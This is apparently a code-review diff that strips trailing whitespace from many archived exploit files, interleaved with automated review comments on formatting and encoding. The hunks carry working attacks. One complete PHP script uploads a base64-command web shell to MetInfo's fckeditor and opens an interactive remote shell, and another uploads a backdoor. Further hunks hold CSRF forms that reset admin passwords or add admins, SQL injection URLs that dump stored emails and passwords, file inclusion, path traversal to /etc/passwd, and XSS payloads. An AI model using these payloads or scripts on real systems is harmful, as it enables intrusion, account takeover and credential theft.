[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Greetings:  No Greet
[x]Greetings: No Greet

View file

@ -19,34 +19,34 @@ set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|        MetInfo 3.0 File Upload (fckeditor) sh3n            |";
print "\n| MetInfo 3.0 File Upload (fckeditor) sh3n |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
 print "\nUsage......: php $argv[0] metinfo.pe path";
 print "\nExample....: php $argv[0] localhost /fckeditor/\n";
 die();
print "\nUsage......: php $argv[0] metinfo.pe path";
print "\nExample....: php $argv[0] localhost /fckeditor/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data  = "--xSsT0rm\r\n";
$data = "--xSsT0rm\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh3n.php.pdf\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "----xSsT0rm--\r\n";
$packet  = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm\r\n";
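Review bot: all indentation inside http_send() and the 'if ($argc < 2)' block is stripped, so the body of 'while (!$sock)' now sits at the same column as the function around it, and the banner literal 'print "\n| MetInfo 3.0 File Upload (fckeditor) sh3n |";' no longer matches the width of the '+----+' lines printed above and below it. Keep leading indentation and the contents of quoted strings, and normalize only trailing whitespace and odd space characters one-for-one.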
@ -58,19 +58,19 @@ else print "\n[-] Shell uploaded to {$html[2]}...have phun!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
 print "\nsh3n-box# ";
 $cmd = trim(fgets(STDIN));
 if ($cmd != "exit")
 {
  $packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $output = http_send($host, $packet);
  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
  $shell = explode("_code_", $output);
  print "\n{$shell[1]}";
 }
 else break;
print "\nsh3n-box# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>

View file

@ -8,4 +8,4 @@ Sql Injection :
http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
################################################################################################################
Thanks Cyber-Warrior.org & AKINCILAR
################################################################################################################ 
################################################################################################################

View file

@ -18,7 +18,7 @@ Description: Change the admin password of the admin panel of oscommerce.And then
<form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
Username<br><input type="text" name="username" value="admin">
<br>Password<br><input type="password" name="password" maxlength="40"></td>
<br><input type="submit" alt="Update" title=" Update " value="Change It!">  <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1"> </a>
<br><input type="submit" alt="Update" title=" Update " value="Change It!"> <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1"> </a>
</form>
</BODY></HTML>
----------------------------

View file

@ -1,6 +1,6 @@
[+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
[+]Date: [13-11-2010]
[+]Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
[+]Author: LoSt.HaCkEr ~ aDaM_TRoJaN
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.1]
[+]CVE :I'M IRaQi ~ Hacker town of Musayyib
@ -12,4 +12,4 @@ http://sourceforge.net/projects/awcm/files/
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings:  No Greet  !_!
Greetings: No Greet !_!

View file

@ -104,7 +104,7 @@ Hide Email ? (Email Göster Gizle)
<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type=radio name="posta_goster" value="1" >
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
<input type="radio" name="posta_goster" value="0" checked="checked">
Hayýr</label>
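Review bot: the context line 'Hayýr</label>' (and 'Doðum tarihi' in the following hunk header) reads as Turkish text decoded with the wrong code page; 'ý' and 'ð' are what 'ı' and 'ğ' become when Windows-1254 bytes are read as Latin-1. If the stored file carries these bytes, a whitespace-only pass leaves the real encoding problem in place; re-decode the file from its original code page and store it as UTF-8 in the same change.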
@ -115,7 +115,7 @@ Doðum tarihi
<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type="radio" name="dogum_tarihi_goster" value="1" checked="checked">
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
<input type="radio" name="dogum_tarihi_goster" value="0" >
@ -127,7 +127,7 @@ Sehir Göster Gizle
<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type="radio" name="sehir_goster" value="1" checked="checked">
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
@ -145,7 +145,7 @@ Online - Offline Göster Gizle
<label style="cursor: pointer;">
<input type="radio" name="gizli" value="0" checked="checked">
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
<input type="radio" name="gizli" value="1" >

View file

@ -4,7 +4,7 @@ Special thanks to Eric Heikkinen for patching these quickly.
Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status=
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
XSS:

View file

@ -16,7 +16,7 @@ The target must be a link to the document root of OpenClassifieds<br>
(If the exploit doesn't immediately reload then blind sqli is
required, which will take a few minutes ;)<br>
<form>
Target:  <input size=128 name=target value="http://localhost/"><br>
Target: <input size=128 name=target value="http://localhost/"><br>
Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
<input type=submit value="Attack">
</form><br>

View file

@ -401,7 +401,7 @@ report.php
$url = " .$_SERVER[PHP_SELF]";
$count = $row[0];
$perpage = 40;list($pagertop, $pagerbottom, $limit) = pager($perpage, $count, $url);
print("<BR><b> Current Email Bans ($count)</b>\n");
print("<BR><b> Current Email Bans ($count)</b>\n");
$url isn't filtered and pager() does not filter anything. So it's vulnerable to XSS.

View file

@ -27,11 +27,11 @@ expl:
</tr>
<tr>
<td align="left" valign="top">Root URL address of your site (with end slash)</td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td colspan="2" align="left" valign="top">Your slogan</td>
@ -90,19 +90,19 @@ expl:
</tr>
<tr>
<td align="left" valign="top">Password-----just 6 characters</td></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top">Password again-----just 6 characters</td></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
@ -113,7 +113,7 @@ expl:
<td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
</tr>
<tr>
<td colspan="2" align="center" valign="top"> </td>
<td colspan="2" align="center" valign="top"> </td>
</tr>
</table>
</form>

View file

@ -12,12 +12,12 @@
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
Xarnuz, Truenex
 
 
 
[POC]
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
 
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
[SQL Injection]

View file

@ -17,7 +17,7 @@ Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
Jordan,Animacco,
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
Rodrix, l0ve, her0
 
[Qcodo Exploit]

View file

@ -6,7 +6,7 @@
# Software: http://www.telematica.com.ar/tcms.asp
# http://www.telematica.com.ar/portfolio.asp
# Tested on: Linux
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
@ -15,8 +15,8 @@ Jordan,Animacco ,
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
Rodrix, l0ve, NetT0xic,
Gusan0r, Sabertrail, Maxi Soler. Darioxchx,r0dr1,Zer0-Zo0rg
 
 
[Authentication Bypass]
http://path/admin/

View file

@ -75,7 +75,7 @@ EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanizat
<tr>
<td width="50%"><table width="100%" height="170" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC" class="proborder">
<tr>
<td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
<td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
[/code]

View file

@ -103,7 +103,7 @@ $post_bd = array(
"description"=>"bla bla bla ,,,","cat"=> 1,
"day"=> 22,"month"=> 11,"year"=>2011,
"picture"=>"@".realpath("dz.php"),
"submit"=>"  Update Event  ");
"submit"=>" Update Event ");
# post backdoor & check
echo (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\n":die("# Failed : can't upload Backdoor");
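
Review bot: the changed `"submit"=>` line sits inside the `$post_bd` array, so collapsing the padding to `" Update Event "` edits a string literal, not layout, and the archived file is no longer a faithful copy of what was submitted. Suggest reverting this line and excluding string literals from the whitespace cleanup.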

View file

@ -1,11 +1,11 @@
# Exploit Title: Pixie v1.04 blog post CSRF
# Google Dork: # Date: 11-Dec-2011
# Google Dork: # Date: 11-Dec-2011
# Author: hackme
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
# Version: 1.04# Tested on: Linux Ubuntu 10.10
# CVE :
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post
[+] Post Method
[+] exploit:
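
Review bot: the header lines this hunk rewrites still carry two fields each: `# Google Dork: # Date: 11-Dec-2011` and, in the context below it, `# Version: 1.04# Tested on: Linux Ubuntu 10.10`. The change only drops trailing whitespace, so anything that reads one field per `#` line will miss the date and the tested platform. Suggest splitting these into separate header lines in the same pass and leaving `# CVE :` empty as it is.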

View file

@ -7,15 +7,15 @@
# http://www.tubeace.com
# Tested on: Linux
# Dork: "?viewStandard=0"
 
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
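
Review bot: removing the indentation from the credit continuation lines leaves `#RemoteExecution Hacking Group` at column 0, where it cannot be told apart from the metadata comments at the top of the hunk (`# Tested on: Linux`, `# Dork: "?viewStandard=0"`). Suggest reducing the indentation of the `[Comment]` continuation lines to a single space instead of none, so anything that parses `#` header lines does not pick up the credits.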

View file

@ -11,7 +11,7 @@
<center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
<span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
<font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
<p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL
KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>

View file

@ -77,7 +77,7 @@ setTimeout('document.test.submit()',0);
<input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
</p>
<p><input type="submit" name="Change" value="Change" />
  </p>
</p>
</form>
</body>
</html>

View file

@ -113,7 +113,7 @@ Greets : Sho0ter , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members
<!-- buttons start -->
<table width="100%" cellpadding="5" border="0">
<tr>
<td width="80"> </td>
<td width="80"> </td>
<td align="right">
<input type="submit" name="Save" value="Save" style="width:80px;">
</td>

View file

@ -7,23 +7,23 @@
# http://www.mediaxxxscript.com/
# Tested on: Linux
# Dork: "Powered by MediaXxx Mobile"
  
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion,ksha,zerial,
    her0, r0dr1 y demas user de RemoteExecution
    wwwremoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
 
her0, r0dr1 y demas user de RemoteExecution
wwwremoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
 
http://localhost/mobile/search?query=[SQL Injection]
 
 
[DEMO]
 
http://server/mobile/search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
-------------------------

View file

@ -102,15 +102,15 @@ Content-Type: text/html
</tr> <tr><td>Comment:</td><td>
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
</td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
<tr><td> </td><td>
<input type="submit" name="action" class="bluebox" value="Update" /> 
<tr><td> </td><td></td></tr>
<tr><td> </td><td>
<input type="submit" name="action" class="bluebox" value="Update" />
<input type="submit" name="action" class="bluebox" value="Delete"
onClick="javascript:return confirm('Really DELETE this end-device record?')"
/>
</td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
</td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<tr><td>Classification:

View file

@ -18,11 +18,11 @@ Project CHAP Security
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
 
[PoC]
http://localhost/classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

View file

@ -8,15 +8,15 @@ Date: 23/07/2012
# www.chap.cl
# Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
# be secured /stay secure
# contacto@chap.cl 
# contacto@chap.cl
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
www.remoteexecution.info www.remoteexcution.com.ar   
#RemoteExecution Hacking Group   
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
find Squid's access.log file path and insert "> Example: ">PWNED!
find Squid's access.log file path and insert "> Example: ">PWNED!
http://server/mysar/www/?a=administration

View file

@ -9,5 +9,5 @@
<form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
<input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
<font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
<font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
<input type="submit" value="Save"></td></tr></table></form></div>

View file

@ -39,14 +39,14 @@ Vulnerable page : http://target.com/[path]/admin/file_io.php
<td width="300" height="50" align="center" valign="middle">
<font color="#808080">New Username:</font>
</td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td>
</tr>
</td>
<tr>
<td width="300" height="62" align="center" valign="middle">
<font color="#808080">New Password: </font> </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" ><p>

View file

@ -77,7 +77,7 @@ type="password" value="abdotv"/></td>
</tr>
<tr>
<td valign="top"> </td>
<td valign="top"> </td>
<td><table border="0" cellspacing="0"
cellpadding="2">
<tr>
@ -86,7 +86,7 @@ cellpadding="2">
<input type="submit"
value="Submit" name="btn_submit" >
</td>
<td width="6"> </td>
<td width="6"> </td>
</tr>
</table></td>
</tr>
@ -109,7 +109,7 @@ value="Submit" name="btn_submit" >
<td width="3%" align="left" background="images/layoutadmin_109.jpg"
style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
width="33" height="20" alt="" /></td>
<td background="images/layoutadmin_109.jpg"> </td>
<td background="images/layoutadmin_109.jpg"> </td>
<td width="3%" align="right"
background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
><img src="images/layoutadmin_111.jpg" width="33" height="20" alt=""/></td>

View file

@ -59,9 +59,9 @@ Error: You have an error in your SQL syntax; check the manual that corresponds t
AND `glpi_tickets`.`is_deleted` = 0
' at line 3
Backtrace :
/var/www/html/glpi/inc/db.function.php :288 DBmysql->query()
/var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable()
/var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech()
/var/www/html/glpi/inc/db.function.php :288 DBmysql->query()
/var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable()
/var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech()
/var/www/html/glpi/ajax/ticketassigninformation.php
@ -98,11 +98,11 @@ WHERE `ext` LIKE \'1\'\'
AND `is_uploadable`=\'1\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3
Backtrace :
/var/www/html/glpi/inc/document.class.php :1232 DBmysql->query()
/var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc()
/var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument()
/var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate()
/var/www/html/glpi/front/document.form.php :99 CommonDBTM->update()
/var/www/html/glpi/inc/document.class.php :1232 DBmysql->query()
/var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc()
/var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument()
/var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate()
/var/www/html/glpi/front/document.form.php :99 CommonDBTM->update()
/var/www/html/glpi/front/document.form.php
@ -121,9 +121,9 @@ Backtrace :
SQL: SHOW TABLES LIKE \'%glpi_users\'%\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
Backtrace :
/var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query()
/var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables()
/var/www/html/glpi/ajax/comments.php :47 TableExists()
/var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query()
/var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables()
/var/www/html/glpi/ajax/comments.php :47 TableExists()
/var/www/html/glpi/ajax/comments.php
======================================================================

View file

@ -1,9 +1,9 @@
source: https://www.securityfocus.com/bid/20202/info
 
BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
 
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
 
BirdBlog 1.4.0 and prior versions are reported vulnerable.
http://www.example.com/[path]/index.php?page=<Script>

Some files were not shown because too many files have changed in this diff